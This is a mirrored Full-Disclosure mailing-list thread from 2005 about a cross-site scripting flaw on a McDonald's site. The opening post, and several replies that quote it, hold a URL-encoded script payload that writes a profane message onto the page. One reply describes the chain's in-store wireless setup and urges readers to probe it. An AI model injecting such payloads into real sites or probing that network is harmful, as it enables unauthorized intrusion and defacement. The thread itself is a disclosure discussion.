Security

NAVIGATION
CATEGORIES
REFERRENCE
LINKS
  • Micky-dee's anyone?

    6 answers - 706 bytes - related search similar search Add To My Delicious Add To My Stumble Upon Add To My Google Mark Add To My Facebook Add To My Digg Add To My Reddit

    To all you people that like McDonalds, here is a quick link that may show you the light:
    %29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%6 5%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61% 63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B %73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6 D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63% 65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E %74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%7 9%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29% 3B%3C%2F%73%63%72%69%70%74%3E
    Interesting, huh?
    Regards,
    Pauil
    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.1 | | 1443 bytes | |

    Just another case of cross site scripting. I would understand people
    caring if it was a bank's sitebut McDonalds?

    tuytumadre (AT) att (DOT) net wrote:
    To all you people that like McDonalds, here is a quick link that may
    show you the light:

    %29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%6 5%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61% 63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B %73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6 D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63% 65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E %74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%7 9%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29% 3B%3C%2
    F%73%63%72%69%70%74%3E
    <%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%6 5%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61% 63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B %73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6 D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63% 65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E %74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%7 9%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29% 3B%3C%2F%73%63%72%69%70%74%3E>

    Interesting, huh?

    Regards,
    Pauil

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.2 | | 350 bytes | |

    5/1/05, Paul Kurczaba <seclists (AT) securinews (DOT) comwrote:
    Just another case of cross site scripting. I would understand people
    caring if it was a bank's sitebut McDonalds?

    Its Mayday,

    Wake up.

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.3 | | 876 bytes | |

    Er, Bank, McD's. The monetary values are not entirely dissimilar.

    XSS is XSS anyway, does it really matter where? Black hats are known
    for their exploitation of "underestimated" weaknesses, so if one were
    feeling philosophical, it could be expressed that this problem may be
    more important than the 'bigger' issues.

    5/1/05, n3td3v <xploitable (AT) gmail (DOT) comwrote:
    5/1/05, Paul Kurczaba <seclists (AT) securinews (DOT) comwrote:
    Just another case of cross site scripting. I would understand people
    caring if it was a bank's sitebut McDonalds?

    Its Mayday,

    Wake up.

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.4 | | 790 bytes | |

    5/1/05, James Tucker <jftucker (AT) gmail (DOT) comwrote:
    Er, Bank, McD's. The monetary values are not entirely dissimilar.

    XSS is XSS anyway, does it really matter where? Black hats are known
    for their exploitation of "underestimated" weaknesses, so if one were
    feeling philosophical, it could be expressed that this problem may be
    more important than the 'bigger' issues.

    You can't pick a better day than May the 1st to disclose a XSS
    vulnerability on a Mc Donands website than on May the 1st, and thats
    the point in this whole little affair.

    Thanks, n3td3v

    This is where I read Full-Disclosure:

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.5 | | 2344 bytes | |

    Speaking of McD's.

    I might as well disclose a little info on the new wireless setups
    they've installed. A while back I did some installations for them.
    Basically they're running a setup designed by a company called
    Wayport. If you ever venture into the back of a McD's they have two
    servers running their PoS systems, accounting, surveillance, etc. I
    forget the names of the servers but the system that's going to the
    wireless is called CCD or CCCD if I remember correctly. The actual
    wireless system uses DSL from BellSouth or another RBC. They have a
    small rackmounted CPU inside the wall-mounted case running Debian. I
    was limited on time so don't bother asking me what kernel/services
    it's running. than that they have the usual DSL filters, a
    Sprint 4 port Hub mounted inside the case and I forget what wireless
    router they are using. The wireless router is mounted above the
    ceiling in front of the registers. Basically if your waiting in line
    your standing right beneath it.

    Also, to spoil your appetites for McD's wonderful burgers, while
    running cables in the ceiling I had the joy of encountering no less
    than 3 dead rats and more dead roaches than I could count.

    Enjoy your food.

    If anyone has more time to do a little probing, post what you find.

    5/1/05, n3td3v <xploitable (AT) gmail (DOT) comwrote:
    5/1/05, James Tucker <jftucker (AT) gmail (DOT) comwrote:
    Er, Bank, McD's. The monetary values are not entirely dissimilar.

    XSS is XSS anyway, does it really matter where? Black hats are known
    for their exploitation of "underestimated" weaknesses, so if one were
    feeling philosophical, it could be expressed that this problem may be
    more important than the 'bigger' issues.

    You can't pick a better day than May the 1st to disclose a XSS
    vulnerability on a Mc Donands website than on May the 1st, and thats
    the point in this whole little affair.

    Thanks, n3td3v

    This is where I read Full-Disclosure:

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
  • No.6 | | 1280 bytes | |

    any way of scripting a free happy meal or somethin?

    5/1/05, tuytumadre (AT) att (DOT) net <tuytumadre (AT) att (DOT) netwrote:

    To all you people that like McDonalds, here is a quick link that may show
    you the light:
    %29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%6 5%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61% 63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B %73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6 D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63% 65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E %74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%7 9%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29% 3B%3C%2
    F%73%63%72%69%70%74%3E<%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%6 5%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61% 63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B %73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6 D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63% 65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E %74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%7 9%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29% 3B%3C%2F%73%63%72%69%70%74%3E>
    Interesting, huh?
    Regards,
    Pauil

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

Re: Micky-dee's anyone?


max 4000 letters.
Your nickname that display:
In order to stop the spam: 9 + 9 =
QUESTION ON "Security"

EMSDN.COM